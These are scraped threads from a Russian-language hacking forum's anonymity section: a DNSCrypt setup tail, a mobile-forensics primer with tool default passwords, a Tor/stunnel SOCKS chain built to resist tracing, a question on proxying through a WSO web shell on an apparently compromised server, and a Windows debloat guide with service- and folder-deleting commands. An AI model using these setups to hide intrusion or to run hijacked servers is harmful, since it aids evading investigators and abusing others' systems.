Проверка работоспособности программы на этом не заканчивается.
Проверьте, чтобы порт 53 не был занят:

Code:Copy to clipboard

$ ss -lp 'sport = :domain' Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 127.0.2.1:domain 0.0.0.0:* udp UNCONN 0 0 127.0.0.53%lo:domain 0.0.0.0:* tcp LISTEN 0 128 127.0.2.1:domain 0.0.0.0:* tcp LISTEN 0 128 127.0.0.53%lo:domain

Как видим, к 53 порту обращаются две программы:
dnscrypt-proxy - 127.0.2.1:domain
systemd-resolved - записи 127.0.0.53%lo:domain

Останавливаем systemd-resolved:

Code:Copy to clipboard

$ sudo systemctl stop systemd-resolved $ sudo systemctl disable systemd-resolved

Наверное, нужно как-то более подробно описать дальнейшие проверки, но я опишу их наиболее лаконично. На мой взгляд, от этой лаконичности они не станут хуже:
Ещё раз проконтролируйте е порт 53
$ ss -lp 'sport = :domain'
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.2.1:domain 0.0.0.0:*
tcp LISTEN 0 128 127.0.2.1:domain 0.0.0.0:*

#################################################################################
PING:
$ ping ya.ru
PING ya.ru (87.250.250.242) 56(84) bytes of data.
64 bytes from ya.ru (87.250.250.242): icmp_seq=1 ttl=63 time=60.0 ms

#################################################################################
Проверяем что сервисы запустились.
$ ps aux | grep dns
$ sudo systemctl status dnscrypt-proxy.service

#################################################################################
Выполните проверку, чтобы убедиться, что dnscrypt-proxy работает:
$ /usr/sbin/dnscrypt-proxy -resolve example.com
Если предыдущий вариант не сработал, то вероятно нужно указать конфигурационный файл программы явным образом:
$ /usr/sbin/dnscrypt-proxy -config /etc/dnscrypt-proxy/dnscrypt-proxy.toml -resolve example.com

#################################################################################
$ dig dnscrypt.info | grep SERVER # Must show matching nameserver, e.g. 127.0.0.1#53, in resolv.conf

Кажись ничего не забыл.
Кроме настройки таблиц IPTABLES.
Но рассматривать настройки фаерволла отдельно от других программ - немного не корректно. Поэтому, эту задачу я возлагаю на тебя, мой уважаемый читатель.
На этом всё. И как пишет один совсем мало знакомый мне персонаж : всем добра, берегите себя.

DFIR | mobile phone forensics (part 1)

ID: 676533bbb4103b69df371914
Thread ID: 125811
Created: 2024-10-29T18:13:37+0000
Last Post: 2024-10-29T18:13:37+0000
Author: ski
Prefix: Статья
Replies: 0 Views: 486

Author : ski
specially forxss.is**
part: 1

Hello XSS fam <3**, **this is my first article. I hope everyone will love it <3
**
in this article i shared basic of DFIR into Mobile phones, in future we will go more deeper

Mobile devices, including smartphones, present a variety of unique challenges to investigators involved in forensic examinations of data from these devices. Part of the challenge arises from the fact that there are so many different makes and models of phones using a variety of underlying operating systems. Because of this, there is no one-size-fits-all forensic solution for mobile devices, and in many cases, numerous tools may need to be used to obtain the data needed for a particular investigation.

Additionally, traditional digital forensics concepts may not apply due to the way flash memory functions. Mobile devices are constantly changing when powered on, and there is no way to write block a mobile device because they communicate using modem protocols, such as AT commands and others. Because of these factors the goal in forensics is to make as little change as possible and to document those changes that were made to the device during the forensic process Just powering on a smartphone generates changes to the data and traces that can be observed of the device. This is true even if the user does not operate the device other than just powering it on.

The device, once powered on, reaches out to the mobile network to authenticate on the system and may store last location data related to mobile towers or GPS if it is enabled.
At some point, however, with few exceptions, the phone most likely must be turned on in order to work with it, unless the capability for data extraction through physical, JTAG, ISP (In System Programming), or chip-off methods exists.

A HOT device would be one that was recently unlocked with the passcode by the user. A COLD device would be one that was freshly restarted and has yet to be unlocked. These concepts make a difference in handling and how the tool can access the data.

Method 1: Always Off Rule for Cell Phones

This method works well if there will be a time delay in examination of the phone that could potentially result in battery discharge and data loss:

• Seize the phone and turn it off

• May remove the battery to prevent phone from accidentally being turned on

• Only turn the phone on when a trusted tool directs you to do so

The benefits of turning off the phone during collection include:

• Preserving call logs and last cell tower location information (LOCI)

• Preventing overwriting deleted data

• Preventing data destruction signals from reaching the mobile phone

• Preventing improper mobile phone handling (for example placing calls, sending messages, taking photos, or deleting files)

The risks of turning off the mobile phone include possibly engaging protection mechanisms, such as encryption, passwords, PIN codes, and more. Turning off the phone also results in loss of data from RAM. Make sure to use caution when turning off a device that was HOT (aka. Recently unlocked with a passcode) as this may be your only chance to get the most thorough dump of data from that phone.

There are five basic levels of acquisition for smartphones, including:

•Manual examination : Process undertaken when the examiner physically scrolls through the mobile device and documents data using photographs or written notes regarding the contents of the device.

•Logical acquisition : Obtaining specific contents of logical storage objects that reside on a file system partition within a mobile device. A tool that communicates with the phone and obtains and reports only existing non- deleted contacts, call history records, SMS text messages, pictures, videos, or one or more items from the previously listed categories is conducting a logical acquisition of the data from the device.

•File system acquisition/Advanced Logical : Partial file system dump. Physical analyzer uses the term “Advanced Logical” for some smart devices, more commonly iOS devices. If we think about “iOS Advanced Logical” it is a partial file system obtained through backup + AFC, if we think about “Android Advanced Logical” it is again a partial file system obtained through backup + MTP + ADB.

•Full file system : Full file system dump, including data from the user data partition. Common with exploits and advanced extraction (CAS, Premium, GrayKey). This is the next best thing to a full physical acquisition.

•Physical acquisition : Use of the term physical acquisition in mobile- device forensics refers to the process of obtaining all the data from first to last bit from one or more physical stores (memory chips) in the mobile device. JTAG, ISP, and chip-off methods fall under physical acquisition. The ability to obtain this type of extraction is becoming rare as encryption mechanisms are constantly growing in strength.

When performing smartphone forensics, it is ideal to first obtain the deepest level of acquisition supported for the make and model of phone you’re working on that the tools you are using will support. Then go back and complete other supported extraction methods that may do a better job of parsing and displaying data from the phone.

For example, if you are able to obtain a physical memory dump from the phone, you get deleted information and files that are locked by the OS when they are in use. You may also be able to obtain security and unlock codes with a physical acquisition. The tool you are using, however, may or may not parse user data in an easily readable format with a physical acquisition.

Therefore, if you next perform a file system and/or logical acquisition of the data, you may obtain better results. Finally, taking pictures of particularly important pieces of data from the device.

It is important not only to know how to use the mobile forensic tools you have access to, but also to know what they are doing when you process a phone. Different mobile forensic tools use different methods to access and acquire the data from different makes and models of phones. The tool itself often makes changes to the data on the phone, including the installation of bootloaders or applications, or use of jailbreaking and rooting methods. These methods are acceptable and necessary to obtain data from the devices, but it is advisable to know what your tools are doing for each phone. It’s important for you to understand how these exploits work and how the tools leverage them. Another reason to know what your tools are doing is that you may find different methods to use the tool to obtain better results.

For example, with Cellebrite Physical Analyzer, on many Android-based devices, using Generic Android Methods under the File System acquisition option may parse more data into usable format than a successfully supported physical acquisition of the same model of phone.

Sometimes, tools may make changes to the original device during acquisition that affect subsequent acquisition attempts. For example, when performing acquisitions on newer iPhones, Oxygen applies an encryption password to devices that have not had a previously encrypted backup, without notification to the examiner. If the examiner attempts a subsequent acquisition using Cellebrite or another tool, they will be asked to supply the encryption password applied by Oxygen during the parsing process, though that password is not well documented. The password is “oxygen”. Cellebrite uses “1234” or “12345” and Magnet uses “mag123” when backup encryption is applied to the extraction. This information isn’t readily available in the documentation, and Elcomsoft Phone Breaker was used to solve the puzzle of what the password was. keep in mind this may happen to you and you may find yourself having to crack a password you and the user did not set on the device.

For older Android devices, we can perform full physical extractions of data using a small program or set of instructions called a “bootloader”. The bootloader is injected into the RAM of the device and executes before the operating system boots. Bootloaders are usually a generic solution, based upon a family of devices, often defined by the chipset in the phone. They are designed to be read-only and are therefore considered safe and forensically sound.

Bootloaders allow for complete acquisition of flash memory of a mobile device, including spare area of the flash memory. Manufacturers of cell phone forensic tools will often create custom bootloaders for full physical acquisition purposes. In order to use a bootloader for acquisition, sometimes the phone must be put into rescue or recovery mode, or a specialized cable might be necessary. Sometimes firmware update protocols are used to insert a bootloader.

When a device is locked, it may be possible to use Android’s recovery partition to access the data on the device. The Android device needs to be placed into recovery mode so the custom recovery image can be pushed to the device. A custom recovery is a third-party image that replaces the stock Android recovery partition and allows the user to gain access to the data or root the device. Again, this is only supported for older, non-encrypted Android devices. A common custom recovery partition is Team Win Recovery Project(TWRP).

EDL mode is available with some Qualcomm chips and can allow low-level access to the chipset. This is designed to allow for device analysis, repair, or re- flashing, but can present the opportunity to achieve a full physical extraction of the data from the chip. EDL mode can be accessed by several software methods, including:

• Special key combinations : Depending on the manufacturer, the key combination may be different. The most common combination from a powered-off state is: Hold Vol Up + Vol Down while connecting USB. Other combinations may include Vol Up, Vol Up + Vol Down + Power, etc. Some vendors have early boot menus that offer the choice of entering the mode (recovery, fastboot, download).

• ADB : Most phones with EDL available allow entry to EDL mode via a command available from an authorized ADB session. (Try: adb reboot edl.) This is useful for obtaining a physical extraction of an unlocked device. This is what Cellebrite UFED attempts when trying "Generic Qualcomm ADB".

• Fastboot : An alternative vendor-specific method exists from the fastboot mode, which is sometimes reachable by other key combinations (usually Vol Down + Power).

• FTM: Some vendors have implemented FTM mode (hold Vol Down while connecting the USB), which exposes an ADB interface. Cellebrite UFED can detect this mode and continue to extract normally using the "Generic Qualcomm ADB" method.

Hardware methods may include :

• EDL cable: Some devices will detect a special cable that will signal the device to enter EDL. Specialized cables may be obtained from various stores and will be supplied by Cellebrite to customers when the phone is supported.

• Test points: Some devices have test points that, when shorted to ground, will cause the device to enter into EDL mode. Depending on the board, they may be easily accessible, even without significant disassembly.

Cellebrite offers additional methods to acquire Android devices that are newer and otherwise inaccessible. These include Qualcomm Live, MTK Live and the latest capability referred to as Huawei (Kirin Live). These extraction methods are linked to the chip inside of the Android and are accessible via UFED.

Most commercial tools that attempt to physically acquire an Android device require that the device enter a mode referred to as Download Mode. Download Mode allows the user to flash the ROM of the device, which then allows the tool to create a forensic image. Flashing the ROM leaves traces on the device. When the custom ROM of the device is modified, it’s tracked within the device. When the device enters Download Mode, the number of flash counts (ROM changes) are listed To enter Download Mode, a specific cable or key combination may be required. Each device may have a unique key combination required. The easiest way to get into Download Mode is to follow the instructions provided by the forensic tool.

The screenshot shows a device that has the original, custom ROM and has not been modified by a forensic tool or user. If a device ROM had been modified, the CUSTOM BINARY DOWNLOAD indicator would say YES or retain the count for the number of times it was flashed, and the CURRENT BINARY may reference something like CUSTOM (or anything other than the OFFICIAL binary that shipped with the device). Keep in mind, your forensic tools make these modifications.

Cellebrite's mobile forensic solutions include a combination of hardware, software, and services designed for extracting and analyzing data from mobile devices. These tools are some of the most popular in mobile device forensics. Cellebrite is strong at application parsing, timelining and carving additional artifacts. Physical Analyzer is a great platform for conducting analysis as it provides support for almost all mobile platforms and shows you both the phone extraction image file and the file system for examiners to dig into data that isn’t parsed.

For those new to this tool, the more you use it, the easier it becomes. The key areas highlighted are the toolbar, where many features are accessible.

A logical keyword search or an Advanced Search at the top right, which lets you search generically for a keyword or as an “and” or “or” request. This also includes the ability to conduct an “in content” search which takes some time but will dive into files that are not parsed by the tool.

to be continued….

Анонимность DNS (DoT, O/DoH, or DNSCrypt/Curve)

ID: 676533bbb4103b69df371a94
Thread ID: 77096
Created: 2022-12-01T04:23:36+0000
Last Post: 2022-12-01T04:23:36+0000
Author: DimmuBurgor
Replies: 0 Views: 485

What is your preference and thoughts on secure NS resolution? What options are there for e2e being developed? And what kind of bullshit is it that Google recursive servers fail to support their own transport protocol!?

Правила раздела

ID: 676533bbb4103b69df3718dd
Thread ID: 125429
Created: 2024-10-23T23:02:38+0000
Last Post: 2024-10-23T23:02:38+0000
Author: r_as
Replies: 0 Views: 483

Правила раздела "Анонимность и безопасность"

В данном разделе приветствуется обсуждение всего что собственно связано с терминами “анонимность” и “безопасность”, а именно:
1. Обсуждения решений по виртуализации (Virtual Machines) таких как VMware, VirtualBox, Parallels, UTM для использования их как элемента в цепочке анонимизации, для тестирования различных программ и утилит в безопасной среде, для использования виртуальной машины как средства разграничения личной и рабочей информации, а также сопутствующие вопросы по настройке рабочей среды, в том числе - настройка роутера (Whonix) и другое.
2. Обсуждения VPN, proxy, Tor в части касаемой их безопасности, а также повседневного использования для обеспечения анонимности.
3. Обсуждения анонимности/безопасности мессенджеров и других систем обмена мгновенными сообщениями (Telegram, Tox, Session, Matrix, Signal, Whatsapp, Viber и прочего).
4. Обсуждения тем связанных с безопасностью криптовалют а также других платежных систем.
5. Обсуждения безопасности операционных систем и аппаратного обеспечение (hardware).
6. Использование TrueCrypt и VeraCrypt, а также другие вопросы связанные с криптографией, и безопасности хранения данных в частности.
7. Настройка “анонимного” модема/емейла/телефона/мессенджера.
8. Обсуждения правовых вопросов (статей Уголовного Кодекса РФ, а также статей УК стран СНГ; вопросов связанные с розыском, экстрадицией и прочего).
9. Обсуждения вопросов Operations Security (OPSEC), безопасности, в том числе и физической.
10. Статьи и мануалы на тему создание собственных решений по анонимизации (или информация взята из просторов интернета), настройка, общие вопросы.
11. В этом разделе также могут содержаться новости из мира информационной безопасности, но только если они касаются вышеописанной тематики (“анонимность” и “безопасность”). Все остальные актуальные новости из мира кибербеза просьба размещать в соответствующем разделе "Новости".

Список тем разрешенных для обсуждения не может быть на 100% определен, поэтому просто помните в каком разделе вы находитесь и о чем пишете. Заранее спасибо.

ОГРОМНАЯ ПРОСЬБА перед созданием темы, не поленитесь и проверьте (Поиск - в правом верхнем углу форума) по ключевым словам существует ли такая же или подобная тема, дабы не плодить дублирующие темы в разделе. Для удобства навигации в разделе, модератором также были закреплены наиболее обсуждаемые темы, в которых можно продолжать обсуждения и дискуссии.

В этом разделе ЗАПРЕЩЕНО вести коммерческую деятельность, для этого есть соответствующий раздел - “Торговая площадка”.

Запрещены оскорбления, нецезурная брань, флуд, оффтоп, и данные действия и неподобающее поведение будут караться предупреждением или баном (при повторном нарушении). Просьба дополнительно внимательно ознакомится также c общими правилами форума (https://xss.is/help/rules/) перед тем как что то размещать/писать в разделе и на форуме в целом.

Приветствуется уважительное обращение ко всем участникам форума, в независимости от их технического уровня и знаний в области анонимности и безопасности. Напоминаю, что у нас есть два официальных языка на форуме это русский и английский, и если вы носитель другого языка вы должны уважать правила форума, и пользоваться переводчиком в данном случае. Всем желаю приятного времяпровождения в разделе и на форуме. “Ученье - свет, а неученье - тьма”.

Вариант собственной анонимной службы SOCKS.

ID: 676533bbb4103b69df371a6d
Thread ID: 86431
Created: 2023-04-22T09:29:53+0000
Last Post: 2023-04-22T09:29:53+0000
Author: SecretHex
Prefix: Статья
Replies: 0 Views: 483

В данной статье переработаны и дополнены некоторые нюансы и актуализированы те моменты, которые устарели во многих похожих статьях на просторах Интернет.

Шаблон конфигурации для организации системы собственного анонимного SOCKS через две сетевые ноды с использованием служб и инструментов tor, stunnel, openssl и iptables, но без учета особенностей алгоритмов шифрования. Так как детальные необходимые настройки в части шифрования вы легко можете сделать самостоятельно, это не входит в тематику данной статьи и непублично:

Даны в основном настройки файлов конфигураций определенных служб, а также основные команды установки и настройки нужного ПО условных сетевых нод(серверов):

a.a.a.a - Frontend_Server
b.b.b.b - Backend_Server

Настройка Frontend_Server:

_Frontend_Server:~# apt-get install tor stunnel4 openssl

Frontend_Server:~# openssl genrsa -out key.pem 2048
Frontend_Server:~# openssl req -new -x509 -key key.pem -out cert.pem -days 1095
Frontend_Server:~# cat key.pem cert.pem >> /etc/stunnel/stunnel.pem_

-----------------------------------------------------

Содержимое файла /etc/stunnel/stunnel.conf

_cafile = /etc/stunnel/stunnel.pem
cert = /etc/stunnel/stunnel.pem
client = yes
socket = l: TCP_NODELAY=1
socket = r: TCP_NODELAY=1
verify = 2
debug = 7

[ssh]

accept = 127.0.0.1:555
connect = sdofmxbgajq5plpuoo5aa3cwsd4dbg245ofic3scwna5luah4bpet7qa.onion:777_

-----------------------------------------------------

Примечание: sdofmxbgajq5plpuoo5aa3cwsd4dbg245ofic3scwna5luah4bpet7qa.onion - это новая версия доменного имени сервиса tor, который расположен на хосте сервера Backend_Server, в директории /var/lib/tor/optik. Имя домена приведено случайным образом и оно может быть любым.

-----------------------------------------------------

Содержимое файла /etc/stunnel/stunnel.conf /etc/default/stunnel4

ENABLED=1

Перезапустить сервис stunnel:
Frontend_Server:~# systemctl restart stunnel4

-----------------------------------------------------

Приблизительное содержимое файла(бывают нюансы) службы TOR: /etc/tor/torrc:

SocksPort 0 OnionTrafficOnly
TransPort 9444
RunAsDaemon 1
VirtualAddrNetworkIPv4 10.192.0.0/10
SocksPolicy accept *
SocksPolicy reject *
SocksPolicy reject6 *
ExitPolicy reject :
ExitPolicy reject6 :
AutomapHostsOnResolve 1
DNSPort 53
DNSListenAddress 127.0.0.1

-----------------------------------------------------

Frontend_Server:~# sysctl -w net.ipv4.conf.eth0.route_localnet=1
Frontend_Server:~# sysctl -w net.ipv4.ip_forward=1

Затем, прописать указанные строки в файл: /etc/sysctl.conf(тут, даны строки, касающиеся только конкретного решения):

net.ipv4.conf.ens0.route_localnet=1
net.ipv4.ip_forward=1

Настройка файервола iptables(также, даны строки, касающиеся только конкретного решения):

iptables -t nat -A PREROUTING -p tcp --dport 111 -j DNAT --to-destination 127.0.0.1:555
iptables -t nat -A OUTPUT -p tcp --dport 777 -j REDIRECT --to-ports 9100

-----------------------------------------------------

Содержимое файла /etc/resolv.conf

nameserver 127.0.0.1

-----------------------------------------------------

Теперь следует перезапустить службы: tor, stunnel на Frontend_Server

Настройка Backend_Server:

Backend_Server:~# apt-get install tor stunnel4 openssl

--------------------------------------------------

Содержимое файла /etc/stunnel/stunnel.conf

_cafile = /etc/stunnel/stunnel.pem
cert = /etc/stunnel/stunnel.pem
socket = l: TCP_NODELAY=1
socket = r: TCP_NODELAY=1
verify = 2
debug = 7
output = /var/log/stunnel4/stunnel4.log

[ssh]
accept = 777
connect = 127.0.0.1:9050_

-------------------------------------------------

_Backend_Server:~# cat /etc/default/stunnel4

ENABLED=1_

Перезапустить сервис stunnel:
Backend_Server:~# systemctl restart stunnel4

-------------------------------------------------

Приблизительное(могут быть нюансы) содержимое файла /etc/tor/torrc:

_SocksPort 9050
RunAsDaemon 1
VirtualAddrNetworkIPv4 10.192.0.0/10
SocksPolicy accept 127.0.0.1
SocksPolicy reject *
SocksPolicy reject6 *
ExitPolicy reject :
ExitPolicy reject6 :
AutomapHostsOnResolve 1
DNSPort 53
DNSListenAddress 127.0.0.1

HiddenServiceDir /var/lib/tor/optik
HiddenServicePort 777 127.0.0.1:777_

Задаем права доступа на файлы сервиса:

Backend_Server:~# chmod 700 /var/lib/tor/optik

Примечание: При перезапуске Тора в папке /var/lib/tor/optik, генерируется onion-домен, в данном случае это sdofmxbgajq5plpuoo5aa3cwsd4dbg245ofic3scwna5luah4bpet7qa.onion

------------------------------------------------

Backend_Server:~# sysctl -w net.ipv4.ip_forward=1

Затем, прописать указанные строки в файл: /etc/sysctl.conf:

net.ipv4.ip_forward=1

------------------------------------------------

Необходимо посмотреть dns адрес сервера Server2, тот, который мы вписываем в конфигурацию stunnel на Server1:

Backend_Server:~# cat /var/lib/tor/optik

или в некоторых случаях: Backend_Server:~# cat /var/lib/tor/optik/hostname

Где должно быть прописано указанное выше внутреннее доменное имя сервиса tor:

sdofmxbgajq5plpuoo5aa3cwsd4dbg245ofic3scwna5luah4bpet7qa.onion

------------------------------------------------

Теперь следует перезапустить службы: tor, stunnel на Backend_Server

------------------------------------------------

Все, теперь можно пробовать подключаться через данный условно анонимный SOCKS на порт 111 по адресу a.a.a.a
При необходимости, через него пробрасывается уже openvpn канал до нужного openvpn сервера, либо делать с ним что-то еще на ваше усмотрение. Цепочку разумеется можно дополнять или модифицировать по-разному. На Backend_Server вы не увидете никаких следов Frontend_Server и выйти на него без раскрутки звеньев ТОР не получится, ни путем сниффинга трафика, ни путем анализа DNS запросов, так как он не использует классическую систему DNS

Крайне важно также понимать следующее:

Для достижения анонимности использования только лишь технологий vpn/proxy/tor сетей недостаточно, это не убережет вас от взлома вашей внутренней сети и приложений в ней посредством уязвимостей и эксплоитов.

Остальные детали и подробности выходят за рамки возможной публичной информации и не являются открытыми.
Варианты других решений, не выходя за рамки допустимой открытости будут вероятно продолжены в дальнейшем.

Спасибо за внимание.

Как поднять VPN\Socks на шелле?

ID: 676533bbb4103b69df371aa5
Thread ID: 74115
Created: 2022-10-09T02:23:25+0000
Last Post: 2022-10-22T05:23:50+0000
Author: JuniorHacker
Replies: 13 Views: 483

Шелл WSO 2.5
Права разные. Есть какой-то мануал?

виртуализация / контейнеры на android

ID: 676533bbb4103b69df371983
Thread ID: 111480
Created: 2024-03-28T12:13:21+0000
Last Post: 2024-03-29T19:48:43+0000
Author: gliderexpert
Replies: 4 Views: 480

Всем привет.
Есть телефон на Snapdragon 888 с LineageOS + nethunter. Нужно - организовать некий быстроразворачиваемый контейнер/песочницу, содержащий целиком вложенную ОС.
т.е. требуется некий аналог VirtualBox'а, но выполняемый под LineageOSом. Эмулируемая архитектура не важна, но предпочтительно arm либо amd64. Обязательное условие - внутри этого контейнера должен заработать полнодисковый LUKS.
Существует ли такая хрень?

Подробная настройка Windows на конфиденциальность + оптимизация

ID: 676533bbb4103b69df37199e
Thread ID: 108689
Created: 2024-02-20T14:23:54+0000
Last Post: 2024-02-20T22:05:12+0000
Author: singular
Prefix: Мануал/Книга
Replies: 1 Views: 478

ВАЖНО, ПРОЧТИТЕ ПЕРЕД НАСТРОЙКОЙ

Это руководство предназначено только для опытных пользователей, которые хотят минимизировать риски при работе с системой Windows. Если вы полный чайник и вам требуется высокий уровень конфиденциальности, для вас записано весьма неплохое руководство на YouTube: https://youtu[.]be/QBp1d2uhG5M. В любом случае: приятного чтения!

Заметка: вы делаете все на свой страх и риск. Система на которой писался этот мануал: Windows 11 22000.376. С ней проблем не возникло.

Плюсы:
Удалим ненужное говно от Windows
Отключим большую часть телеметрии
Получим лучшую производительность

Минусы:
Ломает Sysprep
Нельзя будет использовать sfc/scannow.

Предварительные требования

• Доступ к NTFS
• Install_Wim_Tweak.exe
• DISM++ (необязательно, но рекомендуется)
• WinAeroTweaker

Отключение ненужного софтом (процесс сразу после установки)

Программа, которая используется в мануале:[https://github.com/TheWorldOfPC/Win...y-Guide/blob/main/Files/install_wim_tweak.exe](https://github.com/TheWorldOfPC/Windows11-Debloat- Privacy-Guide/blob/main/Files/install_wim_tweak.exe)
В конце процесса установки создайте локальную учетную запись, не используйте кортану и отключите все пункты в настройках конфиденциальности.

Прошу заметить, весь процесс происходит на временной учётной записи. То есть да, нам потом придётся ее удалить.

Скопируйте и вставьте « install_wim_tweak.exe » в C:\Windows\System32. (Скриншот выше, ссылка на скачку аналогично)

Если вы недавно обновили Windows 11 или только что установили ее, я бы рекомендовал вам очистить хранилище компонентов с помощью команды /resetbase. Или для простоты использовать DISM++, он очищает временные файлы с остатками обновлений в WinSxS. Скачать DISM++: _

![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F08c308f507210c5066cedddba477c402eccd40ae9002c8a24e7efd74370404b1%2FTheWorldOfPC%2FWindows11-Debloat- Privacy-Guide&hash=63d72165233c36e5ecdd5fc70a389209&return_error=1)

[ Windows11-Debloat-Privacy-Guide/Files/Dism++10.1.1002.1.zip at main ·

TheWorldOfPC/Windows11-Debloat-Privacy-Guide ](https://github.com/TheWorldOfPC/Windows11-Debloat-Privacy- Guide/blob/main/Files/Dism%2B%2B10.1.1002.1.zip)

Contribute to TheWorldOfPC/Windows11-Debloat-Privacy-Guide development by creating an account on GitHub.

github.com

_

**Примечание. Если DISM++ выдает ошибку при очистке хранилища компонентов, используйте эту команду (очевидно, командная строка от имени администратора).

Code:Copy to clipboard

DISM /Online /Cleanup-Image /StartComponentCleanup /ResetBase

ТЕПЕРЬ ВНИМАНИЕ! Главный процесс очистки Windows от говна может быть завершён одним запуском скрипта. Если вы не доверяете автору или не хотите повышать риски установкой левого ПО, вы сможете выполнить эти действия самостоятельно. Процесс будет подробно описан в блоке ниже. Тут выбор за вами. Кто выбрал путь со скриптом, скачивайте: [https://github.com/TheWorldOfPC/Windows11-Debloat- Privacy-Guide/blob/main/Files/Windows 11 Debloater.bat](https://github.com/TheWorldOfPC/Windows11-Debloat-Privacy- Guide/blob/main/Files/Windows%2011%20Debloater.bat)

**

После открытия выбирайте первый пункт, он удалит и отключит все ненужное.
Или повторяйте последующие шаги самостоятельно, чтобы достичь того же результата..
(команды удаляют определённый софт, в заголовке указано какой именно)

Будильник и часы

Code:Copy to clipboard

Get-AppxPackage -AllUsers *alarms* | Remove-AppxPackage Get-AppxPackage -AllUsers *people* | Remove-AppxPackage

Тут будет ошибка, можно её проигнорировать.

Калькулятор

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *calc* | Remove-AppxPackage

Скачать нормальный калькулятор можно тут: <https://winaero.com/get-calculator- from-windows-8-and-windows-7-in-windows-10/>

Почта, Календарь

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *comm* | Remove-AppxPackage Get-AppxPackage -AllUsers *mess* | Remove-AppxPackage

Камера

Аналогично, в powershell:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *camera* | Remove-AppxPackage

Игнорируйте любую всплывающую ошибку.

Connect

В командной строке введите:

Code:Copy to clipboard

install_wim_tweak /o /c Microsoft-PPIProjection-Package /r

Contact Support, Get Help

В командной строке введите:

Code:Copy to clipboard

install_wim_tweak /o /c Microsoft-Windows-ContactSupport /r

Cortana (UWP App)

Это ввести в powershell:

Code:Copy to clipboard

Get-AppxPackage -allusers Microsoft.549981C3F5F10 | Remove-AppxPackage

Music, TV

В powershell:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *zune* | Remove-AppxPackage Get-WindowsPackage -Online | Where PackageName -like *MediaPlayer* | Remove-WindowsPackage -Online -NoRestart

Groove Music

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *zune* | Remove-AppxPackage

Microsoft Solitare Collection

В powershell:

Code:Copy to clipboard

Get-AppxPackage *Microsoft.MicrosoftSolitaireCollection* | Remove-AppxPackage

Office

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage *Microsoft.MicrosoftOfficeHub* | Remove-AppxPackage Get-AppxPackage *Microsoft.Office.Sway* | Remove-AppxPackage Get-AppxPackage *Microsoft.Office.Desktop* | Remove-AppxPackage

Get Help

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *GetHelp* | Remove-AppxPackage

Центр обратной связи

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage *Microsoft.WindowsFeedbackHub* | Remove-AppxPackage

Заметки

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *sticky* | Remove-AppxPackage

Карты

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *maps* | Remove-AppxPackage

Удаление служб

В командной строке введите:

Code:Copy to clipboard

sc delete MapsBroker sc delete lfsvc schtasks /Change /TN "\Microsoft\Windows\Maps\MapsUpdateTask" /disable schtasks /Change /TN "\Microsoft\Windows\Maps\MapsToastTask" /disable

OneNote

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *onenote* | Remove-AppxPackage

Фото

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *photo* | Remove-AppxPackage

Включите классический просмотрщик фотографий с помощью WinAeroTweaker.

Погода, Новости

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *bing* | Remove-AppxPackage

Диктофон

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *soundrec* | Remove-AppxPackage

Альтернатива: https://www.audacityteam.org/

Microsoft Quick Assist

В PowerShell введите:

Code:Copy to clipboard

Get-WindowsPackage -Online | Where PackageName -like *QuickAssist* | Remove-WindowsPackage -Online -NoRestart

OneDrive

В командной строке введите:

Code:Copy to clipboard

%SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall rd "%UserProfile%\OneDrive" /s /q rd "%LocalAppData%\Microsoft\OneDrive" /s /q rd "%ProgramData%\Microsoft OneDrive" /s /q rd "C:\OneDriveTemp" /s /q del "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk" /s /f /q

Your Phone

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *phone* | Remove-AppxPackage

Hello Face

В PowerShell введите:

Code:Copy to clipboard

Get-WindowsPackage -Online | Where PackageName -like *Hello-Face* | Remove-WindowsPackage -Online -NoRestart

В командной строке введите:

Code:Copy to clipboard

schtasks /Change /TN "\Microsoft\Windows\HelloFace\FODCleanupTask" /Disable

Магазин Майкрософт

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *store* | Remove-AppxPackage

Ошибку просто игнорируем
В командной строке введите:

Code:Copy to clipboard

install_wim_tweak /o /c Microsoft-Windows-ContentDeliveryManager /r install_wim_tweak /o /c Microsoft-Windows-Store /r

Удаление служб (не рекомендуется, если вы собираетесь использовать какое-

либо приложение UWP)

В командной строке введите:

Code:Copy to clipboard

reg add "HKLM\Software\Policies\Microsoft\WindowsStore" /v RemoveWindowsStore /t REG_DWORD /d 1 /f reg add "HKLM\Software\Policies\Microsoft\WindowsStore" /v DisableStoreApps /t REG_DWORD /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\PushToInstall" /v DisablePushToInstall /t REG_DWORD /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SilentInstalledAppsEnabled /t REG_DWORD /d 0 /f sc delete PushToInstall

Xbox и Game DVR

В PowerShell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *xbox* | Remove-AppxPackage

Удаление служб (не рекомендуется, если вы собираетесь использовать их в

будущем)

В командной строке введите:

Code:Copy to clipboard

